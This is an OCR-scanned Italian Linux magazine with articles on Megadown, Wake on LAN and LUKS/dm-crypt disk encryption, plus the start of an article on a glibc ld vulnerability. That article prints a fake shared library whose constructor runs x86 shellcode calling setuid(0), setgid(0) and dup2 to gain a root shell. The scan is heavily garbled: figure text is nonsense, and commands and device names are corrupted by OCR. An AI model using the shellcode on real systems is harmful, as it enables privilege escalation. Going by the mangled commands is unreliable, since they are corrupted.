Ml (già utilizzato al Passo 2) lanciamo sudo netstat 
-plntu. Analizziamo l'output restituito: la porta utilizzata da 
Apache non è più l'80, ma l'8080. Possiamo quindi prosegui- 
re e passare alla configurazione di Varnish. 


Linux Magazine 


Pagina mancante 


“0 SCARICO 


DAL TERMINALE!” 


Sei un mago della Shell? Grazie a Megadown, scaricare qualsiasi file 
condiviso su MEGA è un gioco da ragazzi 


no dei servizi di condivisione file più 
apprezzati è MEGA. Ha in effetti una 
serie di vantaggi notevoli: i file vengono 
crittografati per garantire la loro sicurezza, vengono 
offerti ben 50 GB di spazio gratuito ed è possibile 
sincronizzare i file sul proprio PC. Se però siamo 
degli amanti del terminale di GNU/Linux, scaricare 


File Modifica Visualizza Segnalibri Impostazioni 


Aiuto 


i file presenti su MEGA può essere scomodo: 
proprio grazie alla protezione crittografica, non 
è possibile utilizzare semplicemente il comando 
wget. Per fortuna, però, esiste uno script chiamato 
Megadown che permette i\l download di file da 
MEGA utilizzando il terminale. Si tratta di una 
funzionalità utile sia su sistemi desktop (perché 


File Modifica 


Visualizza 


spesso i browser sono abbastanza lenti e occupano 
molta memoria, mentre usando il terminale si 
risparmiano tempo e risorse), ma soprattutto 
quando si lavora da remoto. Ad esempio, si può 
aprire una connessione SSH con il proprio NAS e 
scaricare direttamente sul suo hard disk il file che si 


desidera. Scopriamo subito come usarlo! 


Segnalibri Impostazioni Aiuto 


Per scaricare Megadown, lanciamo il comando git clo- 

ne Attps:/github.com/tonikelope/megadown.git in modo da 
ottenere il codice più recente. In alternativa possiamo raggiungere 
la pagina Web del progetto e scaricare il file ZIP da estrarre. 


cnsidiiszia 
ra 
feet AE 
sen è eve 


Procuriamoci l'indirizzo del file da scaricare: può esse- 

re il link inviato da un amico o reperito sul Web. Ricor- 
diamo che la distribuzione di contenuti protetti da diritto d'autore 
è illegale. Non vi è alcun problema con i file di pubblico dominio. 


Dopo il download, ci si ritroverà con la directory mega- 

down, all'interno della quale è presente lo script chia- 
mato anch'esso megadown. Per renderlo eseguibile basta lancia- 
re il comando cd megadown seguito da chmod +x megadown. 


File Modifica Visualizza Segnalibri Impostazioni Aiuto 


Per iniziare il download lanciamo ./megadown 'LINK' 

-o./nome_file, dove LINK è l'indirizzo del file da sca- 
ricare (non dimentichiamo di includere gli apici) e nome._file e il 
nome da assegnare localmente (non è obbligatorio specificarlo). 
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hi lavora con un gran numero di PC in 
i edifici molto grandi, come stabilimenti 
industriali e uffici, può avere la necessità 
di accendere alcuni di questi PC che solitamente 
sono spenti. Per farlo, avrà bisogno di raggiungere 


fisicamente la macchina e premere il pulsante di 
accensione. Ma anche no! Esiste un meccanismo 


“IL PG 


LO ACCENDO © 
DA REMOTO!” 


Forse non lo sai, ma grazie al Wake on LAN puoi avviare 
qualsiasi PC dalla rete locale o via Internet. Ecco come fare 


chiamato Wake on LAN, che permette di 
accendere da remoto computer che sono spenti (ma 
collegati alla rete elettrica). Quando un PC o un 
server è spento, un quantitativo minimo di energia 
elettrica viene comunque fornita alle schede PCI 
e a quelle integrate nella scheda madre. Questo 
permette di tenere la scheda di rete Ethernet in uno 


stato di dormiveglia. Si tratta di una comodità non 
da poco, perché permette la gestione di un'intera 
rete di computer da una unica postazione: basta 
configurare una comoda interfaccia grafica come 
gWakeonLan per poter accendere computer 
lontani anche centinaia di metri con un clic, senza 
bisogno di alzarsi dalla propria scrivania. 


Wake on LAN in 4 passi 


Attiviamo e configuriamo il servizio sul PC da controllare 


* luca:nano 


File 


Modifica Visualizza Segnalibri Aiuto 


Impostaziani 


LA SCHEDA DI RETE 

Assicuriamoci che la scheda di rete del PC da avvia- 

re da remoto abbia la funzionalità WoL: a volte deve 
essere abilitata nel BIOS. La scheda va configurata anche dal 
sistema operativo: modifichiamo il file /etc/network/interfaces 
inserendo la riga iface eth0 inet dhcp e ethernet-wol g. 


bcai + è Và O (n) 


PALA 


| Virvdliritara MAC: Tipaoa di rivisto Destinazione 


TRLIGRIIT 


LA LISTA 
Nel caso si vogliano aggiungere degli altri PC alla lista, 
premiamo +. Il computer deve essere acceso nel mo- 
mento in cui lo si inserisce in lista. Infatti, gWakeOnLan presenta 
l'elenco dei dispositivi rilevati automaticamente nell'attuale LAN. È 
necessario fornire sia L'IP che iL MAC address del PC da controllare. 
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Nome della macchina Tipo di richiesta Destinazione 


>| Indirizzo MAC 


IL SOFTWARE 

Avviamo gWakeOnLan sul PC che si intende usare 

per avviare da remoto l'altro. Un semplice elenco 
permette di vedere quali computer sono stati avviati da re- 
moto in precedenza. Per avviarne uno basta spuntare la sua 
casella e premere il primo pulsante della toolbar. 


Destinazione 


Tipo ci richiesta 


Nome della macchina 


CIÒ Iridirizzo MAC 


Numero di porta UDP: 


EBABFASB5317 


LI Tipo di richiesta ® Locale fbrnadcast] Internet 


TUTTO PRONTO! ù 

Una finestra permette di precisare le informazioni del 

PC che si sta aggiungendo. Oltre a specificare un nome, 
si può confermare l'indirizzo MAC della sua scheda di rete e anche 
la porta UDP da usare (la 9). Specifichiamo se se la richiesta debba 
essere soltanto sulla LAN-o anche da remoto. 
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FILE E DIRECTORY 
SOTTO CHIAVE 


Tieni i tuoi dati al riparo da occhi indiscreti! 
Il kernel Linux ti offre tutti gli strumenti 
per proteggerti da ogni possibile spione 


n alcune situazioni è meglio la crittografia? In termini semplici, è una 
nascondere i dati presenti in una modalità di conversione del file originale 
memoria di massa come un hard disk in una sequenza apparentemente casuale di 
(disco intero, partizioni, cartella o lettere, numeri e segni che solo la persona in 
singolo file) o, più in generale, il contenuto possesso della giusta chiave potrà riconvertire 
di dispositivi portatili come pendrive USB. nelle informazioni originali. Il cifrario è il 
Tale tecnica prende il nome di crittografia sistema — il modo, la tecnica utilizzata — per 
(o cifratura, qualora venissero utilizzare modificare un testo in chiaro trasformandolo 


solo cifre numeriche), parola derivata dal in un testo non-intellegibile detto testo per 
greco che significa scrittura nascosta. Cos'è l’appunto cifrato o crittogramma. 


È TUTTO UN FILE! | Tecnica dm-crypt/LUKS eCryptfs 


Non deve meravigliare se l'accesso 
a intere partizioni (cifrate o meno) 
sia possibile interfacciandosi grazie 
a “particolari” file. Nei sistemi GNU/ 
Linux un aspetto peculiare è relativo 
alla gestione dei file: in quanto 
sistema derivato da Unix allora 


eredita il medesimo paradigma n mne SOR 
per il quale tutto è un file. Senza Intero Neo ; Cartella su 
voler entrare nell'architettura del partizioni e file filesystem esistente 


sistema possiamo immaginare che 
l'accesso ai file, così come alle 
periferiche [ad eccezione delle 
interfacce di rete), sia gestito con 
una interfaccia identica. Allora 

ecco che un'file identificato dalla 
lettera b permette l'accesso ad 

un dispositivo a blocchi così come 
un dispositivo caratteri (la scheda . 
grafica) sia identificato con la 
lettera c, una directory dalla lettera 
d, un link dalla | e un file “normale” 
dalla f. Per rendercene conto 
possiamo dare il comando Is -I /dev. 


GPL 


NO 


Fig. 1 è Confronto delle principali caratteristiche di due metodi di cifratura 
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Dati cifrati 


Ihomelutenteldaticifrati . 


mount /dev/mapper/volumecifrato /'home/utente/daticifrati 


IdevImapperlvolumecifrati 


Idevisdci 


cryptsetup luksOpen /dev/sdc1 volumecifrato 


passphrase 


Fig. 2 è Formato LUKS in alto, funzione PBKDF2 e astrazione in basso 


QUALE TECNICA 
SCEGLIERE? 


Tutto dipende da cosa vogliamo cifrare. Alcune 
tecniche possono agire al livello di dispositivo 
a blocchi, altre solo su singoli file permettendo, 
però, una trasportabilità delle informazioni cifra- 
te trasferendole su cartelle condivise, chiavi USB 
o nel cloud. Principalmente, due sono i metodi 
che permettono la crittografia dei dati: Block 
Device Encryption e Stacked Filesystem En- 
cryption. Alla distro in uso, al di là di eventuali 
tool in user space, non dobbiamo aggiungere 
nulla poiché le due tecniche sono integrate nel 
kernel Linux a partire dal 2006: pertanto, da anni 
utilizzate da utenti e aziende. Con il Block De- 
vice Encryption il kernel Linux crea, come sug- 
gerisce il nome stesso, un dispositivo a blocchi 
cifrato: di fatto, un contenitore cifrato che può 
essere un intero disco, una partizione o un file 
da utilizzarsi come qualsiasi altro dispositivo a 
blocchi del sistema: può essere partizionato, in- 
serito in una struttura LVM (Logical Volume 
Manager), RAID (Redundant Array of Inex- 


pensive Disk) o usato come disco. Ciò implica, 
però, che si deve decidere in anticipo l’uso di 
questa metodologia al fine di allocare lo spazio 
necessario per poi formattare lo spazio allocato. 
La tecnica Stacked Filesystem Encryption si 
pone al di sopra di un file system già esistente 
(pertanto non dobbiamo prevedere l’allocazione 
di alcuno spazio) aggiungendo un nuovo livello 
dove viene montata una cartella superiore nella 
quale il contenuto apparirà in chiaro - se si pos- 
siede la chiave di decifratura - rispetto a quelli 
effettivamente archiviati sul file system che ri- 
sulteranno cifrati. Il contenitore sarà quindi una 
directory in un esistente file system. File diversi 
possono essere crittografati con chiavi diverse. 
Tuttavia gli attributi sono in chiaro: un pirata po- 
trebbe vederne la dimensione e i metadati. 


ANALIZZIAMO DM-CRYPT 


Abbiamo accennato alle caratteristiche, breve- 
mente riassunte in Fig. 1, di due modalità di 


Dati 
Cifrati 


Idevisdc1| 


chiave 
derivata 


cifratura alle quali corrisponderanno altrettanti 
software. In particolare alla prima categoria è 
possibile scegliere le soluzioni loop-AES e dm- 
crypt, mentre alla seconda eCryptfs e EncFS. 

In queste pagine ci soffermeremo su dm-crypt. 
Questa funzione di criptazione è offerta dal 
kernel Linux dall’omonimo modulo e utiliz- 
zabile attraverso l’apposito software in user 
space cryptsetup (www.edmaster.it/url/7380) 
che dunque provvederemo ad installare con 
il comando dnf install cryptsetup (se stiamo 
usando Fedora), zypper install crytpsetup (per 
OpenSUSE) o, più in generale, con il gestore 
dei pacchetti della distribuzione in uso. Instal- 
lato il software di base, prima di fare qualche 
prova riportiamo alcune informazioni un po’ più 
tecniche al fine di comprenderne il principio di 
funzionamento. Dobbiamo sapere che dm-crypt 
è il livello software che cripta i dati e li scrive 
sul dispositivo di memorizzazione utilizzando 
il formato LUKS (Linux Unified Key Setup, 
Fig. 2). L'header del formato contiene informa- 
zioni circa il cifrario utilizzato, l’UUID del vo- 
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UN PROMEMORIA 
Quattro cose da ricordare 


Inizialmente abbiamo utilizzato la parola password per poi sostituirla in toto con pass- 
phrase. Qual è la. differenza? Una password è tipicamente composta da 6-10 caratteri 
casuali mentre una passphrase è più lunga poiché trattasi di un'intera frase, ad esempio 
“Uso un sistema GNU/Linux!”. Il vantaggio di una passphrase è evidente: è più facile da 
ricordare ed è anche più difficile da scardinare (è più lunga di una password e usa tutta 
una serie di caratteri). La creazione della chiave crittografica a partire dalla passphrase è 
permessa grazie agli algoritmi di cifratura: è possibile utilizzare tutti quelli supportati? Sì, 
a patto che siano disponibili nel kernel Linux: l'elenco lo si ottiene con cat /proc/crypto. In- 
fine, un'ultima osservazione sugli algoritmi di hash. Trattasi di applicazioni unidirezionali 
(irreversibili, a differenza della cifratura di un testo che è reversibile) alle quali fornendo 
una stringa in ingresso verrà restituita una stringa in uscita di lunghezza costante indi- 
pendentemente dalla lunghezza della stringa di input. La caratteristica è fornire sempre 
la stessa uscita se la funzione di hash e l'input non cambiano. Modificando anche una sola 
lettera, l'hash fornirà un risultato totalmente differente. Per questo motivo viene utilizza- 
to l'hash criptato della password/passphrase in aggiunta a un salt e ciò al fine di evitare 
l'attacco rainbow table che il pirata usa per il crack delle chiavi di cifratura. 


LIILI 
@ c® 


lume e molte altre tra le quali, meritevoli di un 
pizzico di attenzione in più, le Key Slot (in nu- 
mero di 8) e le Master Key. Senza voler entrare 
nel dettaglio, che esulerebbe da tale contesto in 
quanto più adatto ad un ambiente di ricerca sulla 
sicurezza informatica, la password o passphra- 
se che forniamo nel momento in cui andremo 


a creare il volume cifrato verrà presa in conse- 
gna dall’algoritmo PBKDF?2 (Password-Based 
Key Derivation Function 2) il quale la manipo- 
lerà dapprima con una funzione pseudo-casuale 
unitamente ad un salt (letteralmente sale, una 
sequenza casuale di 256 bit): tale procedura 
verrà reiterata un certo numero di volte per un 


dato tempo al fine di produrre una chiave ad alta 
entropia da utilizzare come chiave crittografica, 
detta chiave derivata. Questa dinamica, che 
prende il nome di key stretching, ha l’obietti- 
vo di creare una chiave più resistente all’attacco 
brute force, ovvero il tipico attacco che con- 
templa il provare tutte le possibili soluzioni, in 
funzione del numero e del tipo di caratteri uti- 
lizzati, fino a che non viene trovata la sequenza 
corretta. In tale scenario, se volessimo cambiare 
passphrase, sarebbe possibile senza creare da 
zero un nuovo volume? La risposta è afferma- 
tiva e viene utilizzata l'opzione luksAddKey 
del comando cryptsetup. Ciò perché nell’hea- 
der viene scritta la Master Key con la quale i 
dati vengono crittografati. A sua volta, la Ma- 
ster Key è memorizzata in forma crittografata in 
una delle Key Slot associata a sua volta ad una 
sezione Key Material. Quando una Key Slot è 
attiva essa immagazzina una copia della Master 
key cifrata nella sezione KM corrispondente. 
Tale copia cifrata è accessibile solo utilizzando 
la passphrase che l’utente ha fornito durante la 
fase di creazione del volume cifrato o in nuove 
aggiunte: infatti, sarà proprio la passphrase cor- 
rispondente a sbloccare la decriptazione della 
Key Material associata che contiene la Master 
Key con la quale il sistema decripterà il conte- 
nuto del volume. 

Così come è possibile aggiungere nuove passphra- 


ZuluCrypt: alla scoperta della sua interfaccia grafica. 


Creiamo un file da utilizzare come contenitore e blindiamo i nostri documenti e directory più importanti. 


Path Ta File [Mame/mhrie/Test/Mieofrato 


4 Do NatWrite Random Data To 
Li ty Contiliae:STRONGLI Gscduriged) 


FaeSizt fi e ER 


clicchiamo su Create. 
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CONTENITORE 
Avviamo zuluCrypt e dal menu Create optiamo 
per Encrypted Container In A File. Nella pop-up a 

comparsa riportiamo in File Path il percorso dove vogliamo 


creare il container e in File Name il nome del container. In 
File Size riportiamo la dimensione, ad esempio 1 GB, quindi 


Key sccscsescscosese 


ile SAT PROSE | 


PASSPHRASE 
ZuluCrypt, e quindi dm-crypt, oltre ad una pass- 
phrase accetta anche un file come chiave. Termi- 
nata la creazione del container nella nuova finestra dal menu 
a tendina optiamo per Key e nell'omonimo rigo riportiamo la 
passphrase che ripeteremo in basso: la qualità verrà valuta- 


ta nella barra di stato. In Volume Type scegliamo LUKS. 


se (per un massimo 8) analogamente sarà possibile 
rimuoverle tramite l’opzione luksRemoveKey: in 
questo caso occorre fare attenzione perché se ven- 
gono tutte cancellate non vi sarà più la possibilità 
di “sbloccare” la Master Key e quindi decifrare la 
partizione. Va da sé che in un tale scenario i dati 
sono di fatto persi a meno di aver fatto preventi- 
vamente un backup dell’header con il comando: 


cryptsetup luksHeaderBackup /dev/ 
nome device --header-backup-file 
/home/utente/mio file backup 


che potrà essere ripristinato utilizzando l’opzione 
luksHeaderRestore. Dal punto di vista dell’uten- 
te, dm-crypt/[LUKS formano un livello di astrazio- 
ne trasparente. Quando accediamo ad un disposi- 
tivo, ad esempio /dev/sdc1, fornendone la giusta 
passphrase, tale dispositivo verrà mappato in /dev/ 
mapper/nome_device e apparirà all’utente come 
un normale disco rigido non crittografato (Fig, 2). 


PRATICA? PRIMA 
DA TERMINALE 


La procedura non è difficile, occorre solo un 
po’ di attenzione nella sequenza dei comandi, 
fermo restando la notevole complessità pre- 
sente nel back-end. Procedura volutamente 


Fie Madifica. Visualizza Seg: 


Fig. 3 e Nel primo slot è presente, in modalità cifrata, la password inserita 


generica affinché chiunque possa seguirla in- 
dipendentemente dalla distribuzione utilizzata 
poi, nei tutorial presenti in queste pagine, verrà 
utilizzato un programma grafico ad-hoc. Poi- 
ché abbiamo già provveduto in precedenza ad 
installare il software in user space, allora pos- 


siamo procedere con la creazione del volume 
cifrato che nel nostro caso sarà un hard disk 


cartelle di lavoro con dati sensibili, ecc.) che 
nel nostro test è identificato con /dev/sde, ma 
da verificare caso per caso. Nota importante: 
prima di impartire (con le credenziali dell’am- 
ministratore) i comandi che seguono assicu- 
riamoci che sull’unità non vi sia nulla, poiché 
la procedura è distruttiva! Come primo passo 
verifichiamo che il modulo dm_crypt risulti 
caricato con Ismod | grep dm_crypt. Qualo- 


esterno (tipicamente utilizzato per i backup, 


gpecnee 


;C. Open Create  Votumes. Favorites. Options. Help nm Create: Moluenes. Faiorites | Optiome Help 


Encrypted Volume Pattr Encrypted Volume Mount Point Patti Type Encrypted Volne Pat Encrypitedì Votuame Mioust Piodert Pratt Type 
x ’ 
Close 
Uniock Encrypted Volume x Properties 
cea Open Folkier 
Volume Path | Mome/michete/Testifilecifrato ia 
Add Key 
1d 
Mount Name | container] Remoue Key 
pun È di Mode 
Mount In Read Qaty Mod Backup LUKS Header 
Share Mount Point 
Att To Favorite 


/ VeraCrypt Votuzve 


Ro Ba È lime 


Come cifrario crittografico possiamo lasciare, per 
questa prima prova, quello di default. Nel menu File 
System scegliamo quello di interesse e infine in RNG il genera- 
tore casuale per aumentare l'entropia. Clicchiamo su Create per 
vedere, dopo qualche secondo, apparire la pop-up che riporta il 
successo della creazione. Passiamo all'apertura. 


Clicchiamo su Open, quindi Volume Hosted In A File: 
in Volume Path riporteremo il percorso al contai- 
ner, in Mount Name un nome, ad esempio volumecifrato e la 
passphrase in Key. Premiamo Open: si aprirà il file manager 
nel container. Terminato di lavorare lo chiuderemo con un 
clic su Close dal menu contestuale. 


ess 
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ZuluCrypt 


Encrypted Yi 


2C Open Create Volumes Favorites Options. Help — 


Unlock Encrypted Vofume 


Togneni Samos NIN Sa 


luks Key Module 


(Irootfheaderseparato.volumeHeaderBackUp —— 


Fig. 4 è Procedura con header separato 


ra non ricevessimo alcun output vorrà dire che 
non lo è, allora provvederemo con modprobe 
dm_crypt, verificando di nuovo con lsmod 
l'effettivo caricamento affinché sia possibile 
usufruire della funzionalità di criptazione inte- 
grata nel kernel. 

Verifichiamo, qualora il disco le presentasse, 
la partizione che vogliamo cifrare (fdisk /dev/ 
sde -1). Ipotizziamo che sia sdel. Smontiamo il 
disco, quindi passiamo la partizione da cifrare 
al comando cryptsetup luksFormat /dev/sdel 
che adotterà le impostazioni di default (per ap- 
profondimenti, man cryptsetup). Volendo pas- 
sare parametri e opzioni possiamo utilizzare: 


cryptsetup -v -y --cipher aes-xts- 
plain64 --key-size 512 --hash 
sha512 --iter-time 5000 
--use-urandom luksFormat /dev/sdcl 


dove con l’opzione --cipher passiamo il tipo 
di cifrario crittografico da utilizzare (il default 
è quello indicato) seguito dalla specifica della 
lunghezza della chiave (default 256 bit) e l’al- 
goritmo di hash da utilizzare (default sha256). 
Le successive due opzioni dicono a cyptsetup 
per quanto tempo in millisecondi deve elabora- 
re la passphrase passata e di utilizzare come ge- 
neratore casuale — per aumentare l’entropia — il 
file /dev/urandom (il default è --use-random 
ovvero /dev/random). 

Premendo Invio, verrà chiesto di digitare YES 


end 
000 
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(lettere maiuscole) seguito dalla passphrase da 
riportare due volte, la seconda come verifica 
(opzione -y). Se non riceviamo alcun errore 
possiamo ritenere il volume cifrato corretta- 
mente creato. Con cryptsetup luksDump / 

, dev/sde1 (Fig. 3) possiamo leggere le informa- 
zioni contenute nell’header così come farne un 
backup con: 


cryptsetup luksHeaderBackup /dev/ 
sdcl --header-backup-file / 
percorso/filebackup 


A questo punto dobbiamo aprire il volume 
creato sul device mapper (Fig. 2) con crypt- 


setup luksOpen /dev/sdc1i volumecifrato 
laddove “volumecifrato” è il nome, qualun- 
que, che possiamo dare al volume creato. Pre- 
miamo Invio e inseriamo la passphrase non 
appena ci verrà chiesta. Al ritorno del prompt, 
avremo il nostro volume in /dev/mapper/vo- 
lumecifrato in luogo dell’effettiva partizione 
/dev/sdc1. Possiamo verificare lo stato della 
mappatura con cryptsetup -v status volume- 
cifrato. Il passo successivo è la formattazio- 
ne del volume non prima di aver cancellato 
la partizione da tutti i dati con dd if=/dev/ 
urandom of=/dev/mapper/volumecifrato 
status=progress che prenderà alcuni minuti 
(nel nostro test circa 6 per 8 GB) a cui farà 
seguito il comando per la formattazione mkfs 
-t ext4 /dev/mapper/volumecifrato. Creato 
il file system, montiamo il disco in una car- 
tella di nostro gradimento mount /dev/map- 
per/volumecifrato /home/utente/daticifrati. 
Il comando Is -la /home/utente/daticifrati 
mostrerà un volume vuoto e il comando df 
-H (man df) i dispositivi montati tra i quali 
il volume appena creato dove copiare/salvare 
dati sensibili. 

Finito di utilizzare il disco procederemo 
al suo smontaggio umount /home/utente/ 
daticifrati. Ma non è sufficiente. Infatti, se 
lasciassimo tutto così il volume rimarrebbe 
ancora mappato sul device mapper in /dev e 
chiunque avesse accesso all’account root po- 
trebbe montare il volume curiosando così tra i 
dati. Per questo motivo occorre assolutamen- 
te chiudere il mapping con cryptsetup luk- 
sClose sdel. Osserviamo come la procedura 
sia stata applicata per un intero volume, ma è 
valida anche per un contenitore all’interno di 
una partizione. In questo caso il punto di par- 
tenza è la creazione del file da utilizzare come 


LUKS OVUNQUE! 


Anche su sistemi Microsoft Windows 


LybreCrypt {/ttps://github.com/t-d-K/librecrypi} è un fork iniziato nel 2004 del 
progetto, oggi non più sviluppato, FreeOTFE (Free On-The-Fly Disk Encryption). Di- 
sponibile per il sistema operativo di casa Redmond, la sua caratteristica (è 
per questo che lo riportiamo qui) è quella di essere assolutamente compa- 

| tibile con dm-crypt/LUKS. Ciò vuol dire che coloro i quali hanno creato il 
proprio volume cifrato in un dispositivo portatile (pendrive USB o hard disk 
esterno] e si spostano, per motivi di lavoro, tra i sistemi operativi GNU/ 
Linux e Microsoft Windows, possono utilizzare LibreCrypt (nello specifico 
DoxBox] per poter accedere ai propri dati cifrati, naturalmente con filesy- 
stem leggibili eventualmente utilizzando Ext2Fsd [www.ex#2fsd.com)). 


contenitore, ad esempio da 1024 MB, con dd 
if=/dev/urandom of=/percorso/nome_file 
bs=512K count=2048. Da questo punto in 
poi si procede in maniera del tutto analoga a 
partire dalla creazione del formato LUKS. 


CON L'INTERFACCIA 
GRAFICA! 


Sebbene l’utilizzo del terminale permetta di 
affrontare e capire la dinamica, alcuni lettori 
potrebbero essere interessati solo al risultato: 
è possibile utilizzare il programma zuluCrypt 
(www.edmaster.it/url/7381), un front-end 
grafico per cryptsetup che permette di sem- 
plificare le operazioni di creazione, accesso, 
rimozione e gestione di container cifrati così 
come riportato nei tutorial di queste pagine. 
AI momento in cui scriviamo, non è diffuso 
nei repository ufficiali di tutte le distribuzioni: 
pertanto in alcuni casi occorrerà ricorrere a 
repository di terze parti. 


ALTRE CARATTERISTICHE 


Esistono ulteriori funzioni di LUKS che è 
possibile attivare: tra, queste, è meritevole 
di attenzione la possibilità di utilizzare il 
volume cifrato in un contenitore e l’header 
in un’altra partizione o disco. Questa fun- 
zione ritorna utili in alcuni contesti. Infatti, 
poiché LUKS non cripta l’header allora chi 
si trova davanti quel device osservando la 
presenza dell’header intuirebbe la presenza 
di.un volume cifrato LUKS. L'operazione di 
separazione dell’header è, ovviamente, pos- 
sibile da terminale durante la creazione del 
volume aggiungendo --header /percorso/ 
header al comando cryptsetup. In fase di 
apertura del volume, se non riportassimo la 
posizione dell’header, il volume non verreb- 
be aperto e per questo motivo che all’opzio- 
ne luksOpen si dovrà indicare la posizione 
dell’header aggiungendo di nuovo la riga 
sopra riportata. È possibile fare la stessa 
cosa anche con zuluCrypt: nel secondo 


passo del primo tutorial, in Volume Type, . 


Backup e dintorni 


Come gestire il contenitore cifrato? Scopriamolo subito! 


Volume Path {mome/mucheter Fest/Necirato frato 
Bachp pith [rootMectratoisVolumeHesderBackUp || 

#) Manage A LUKS Header 5 
) Manage A TrueCrypt Hesder 


‘) Nortnai VGume 


CI Mido pat 8 patemi Vote 
CI Whole Drive Encrypreg Value 


18) Key 
) Kiyftia 
Esiter an cassino key.ia the voturoe. 


BACKUP 

Al Passo 2 del tutorial prece- 
dente, al termine della fase 
di creazione del volume, il programma 
ricorda all'utente di creare un backup 
dell'header. Dal menu Volumes clic- 
chiamo su Backup Volume Header: in 
Volume Path riportiamo il percorso del 
container e in Backup Path un percorso 
possibilmente accessibile solo all'am- 
ministratore. Premiamo Backup. 


NUOVE PASSPHRASE 
Per aggiungere nuove pas- 
sphrase al volume, da Vo- 
lumes clicchiamo su Add A Key To A 
Volume. In Volume Path indichiamo il 
volume cifrato, nel rigo Key riportia- 
mo la passphrase di accesso. In Key 
To Be Added To The Encrypted Volu- 
me, la nuova passphrase da ripetere 
nel rigo in basso. Confermiamo con un 
clic su Add. 


optiamo per LUKS+External Header. Al 
momento dell’apertura nel menu a tendina 
del terzo passo del primo tutorial, optiamo 
per Plugin e, cliccando sull’icona a fian- 
co del rigo Plugin Name, scegliamo luks, 
quindi Open. Si apre una nuova pop-up nel- 
la quale riportare la passphrase e il percorso 
all’header LUKS, ad esempio alla copia di 
backup (Fig. 4). 

Quando si decide di adottare un filesystem 
cifrato ci si aspetta un calo nelle prestazioni. 
Per la modalità discussa in questo articolo 
occorre dire che è il sistema rimane veloce 
ed efficiente, anche in considerazione del 
fatto (Figura 1) che le CPU odierne suppor- 
tano l’accelerazione crittografica AES-NI. 
Per verificare se la CPU in uso la supporti 
impartiamo grep -ml1 -o aes /proc/cpuinfo. 
Se la risposta è aes allora la nostra CPU è 
abilitata. Per qualsiasi domanda o chiari- 
mento possiamo fare riferimento al forum 
di Linux Magazine (Attp://linux-magazine. 
edmaster.it/forum/). 


Tinux-q96j:/heme/michele » cryptsetup luksDunp /hose/michele/Test/ftlectfrato 
LUKS header information for shome/michele/Test;fflecttrato 


Version: 1 
Cipber name: aes 
xts-plain6s 
sha2S6 


Cipher node: 
Hash spec: 
Payloa9 offset: 4096 

wo bits: 256 

mi digesti 68 €2 20 dd 93 67 cc Ga 7 63 bd 40 Gu di de e5 ac 05 Gb Gc 
mu salti 33 e9 de de 20 Sb di b8 3c ea 71 02 d7 29 f9 sé 

be Bd 43 Gd 19 di SS Ga el #2 5f 20 3d 89 3297 

47750 
CTC9ZB44-9206-4547-B09)-c4981fbc4065 


Wi Jterations: 
uvID: 


Ney Slot è: ENABLEO 
Iteratfons: 
Salt: 


160348 | 
de bd 19 fi eî Ra as 7a fe si 21 de 02 fi ea 12 [il 
e2 GO 87 09 59 Sd Ga 53 6b 4f Ra 22 79 he bs bs Îll 


rey moterial offset: 3 
AF stripes: 40086 

Key Slot 1: ENABLED 
Iterattons: » 
salti 


201257 È 
35 eB le f5 9f 0f 24 co f8 3f 4e 57 65 n4 de 2e Î 


HA ef 04 ds fe T2 16 f9 BA 21 c1 Sf 14 ST 56 an il 
Key matertal offset: 264 


4999 


GLI SLOT 

Al termine apparirà una 

pop-up che ricorderà gli slot 
in uso, nello specifico il messaggio 2 / 
8 slots are in use. Infatti, se provassi- 
mo a fare un dumping dell'header con 
cryptsetup luksDump /percorso/fileci- 
frato noteremo due slot attivi: questo 
vuol dire che possiamo accedere al 
volume cifrato utilizzando una delle 
due passphrase. 
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Attenzione alle librerie condivise 


Quasi tutti i programmi sviluppati per GNU/Linux sono basati su glibc. Ma proprio in questa 
libreria c'è un bug che può garantire una shell di root a un malintenzionato 


no dei pilastri del progetto GNU, e del sistema opera- 

tivo GNU/Linux, è la libreria C nota come glibc. Que- 

sta libreria fa parte delle API fondamentali del sistema 
e da essa dipende praticamente qualsiasi altro programma. 
È un progetto nato negli anni ‘80 dallo sviluppatore Roland 
McGrath e arrivato a maturità nei primi anni ‘90. Il suo scopo 
è implementare tutte le funzionalità degli standard ANSI per il 
linguaggio di programmazione C e POSIX per la struttura del 
sistema operativo tipo Unix. In questo modo i programmatori 
non devono preoccuparsi di studiare e seguire gli standard: 
devono solo utilizzare glibc e possono star certi che il loro 
lavoro sarà corretto. Tra i tanti componenti di glibc vi è ov- 
viamente anche il programma noto come ld. Quest'ultimo ha 
una funzione chiave nei sistemi operativi GNU/Linux, perché 
si occupa di caricare dinamicamente le librerie condivise. Se 
controlliamo con un task manager, o semplicemente le di- 
pendenze nel package manager, noteremo che praticamen- 


cat > la.c << "EOF" 


static void attribute _ ((constructar)) init (void) { 


asm__— volatile | 
“addl 564, %esp;" 
/# setuid(0); 
“movl $23, Seax;" 
“mov $0, Sebx;" 
“int $0x80;" 
/#f setgid(o); 


“movl $46, %eax;" 
“*movl $0, %ebx;" 
“int $0x80;" 

{i dup2t0, 1); 
"movi $63, $eax;" 
*movì $0, %ebx;" 
“mavl $1, %ecx;" 
"int $0x80;" 

ff dup2(0, 2}; 


I Fig.1-°La finta libreria scritta solo per inserire nella 
memoria uno shellcode 
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te qualsiasi programma fa uso di Id. | software sono infatti 
compilati in modo condiviso: significa che ogni programma 
porta nel proprio codice binario soltanto se stesso e non an- 
che le varie librerie da cui dipende, che vanno installate a 
parte. Questo è un vantaggio perché se più programmi di- 
pendono dalle stesse librerie basta installarle una volta sola e 
verranno condivise da tutti. Ad esempio, esistono centinaia di 
programmi che usano le librerie grafiche Qt: installandole una 
volta sola, tutti i programmi potranno automaticamente usarle 
senza bisogno di occupare altro spazio. Si capisce quindi che 
Id è uno strumento fondamentale, presente su tutti i siste- 
mi GNU/Linux: senza di esso, i nostri sistemi non potrebbero 
funzionare, anche se spesso è poco conosciuto come tutti i 
componenti di base del sistema. In fondo, la maggior parte 
degli utenti non è interessata a sapere che cosa faccia fun- 
zionare il sistema, dando per scontato che tutto vada sempre 
come deve andare. Il problema è che anche componenti fon- 
damentali come Id non sono altro che programmi e possono 
quindi contenere errori e bug. Ne parliamo, ovviamente, per- 
ché è stato scoperto un bug proprio in Id, che rende quindi 
vulnerabili praticamente tutti i sistemi GNU/Linux. E nem- 
meno da poco tempo: il bug è presente dal 2006, solo che 
nessuno se n’era accorto. Prima che ci si possa spaventare, 
comunque, specifichiamo che il bug non è troppo pericoloso: 
pur essendo grave in teoria, in realtà sfruttarlo sarebbe molto 
difficile ed è praticamente impossibile che qualche pirata lo 
utilizzi per attaccare i nostri sistemi, considerato che esisto- 
no metodi più efficaci. È utile, però, per ricordarsi che anche 
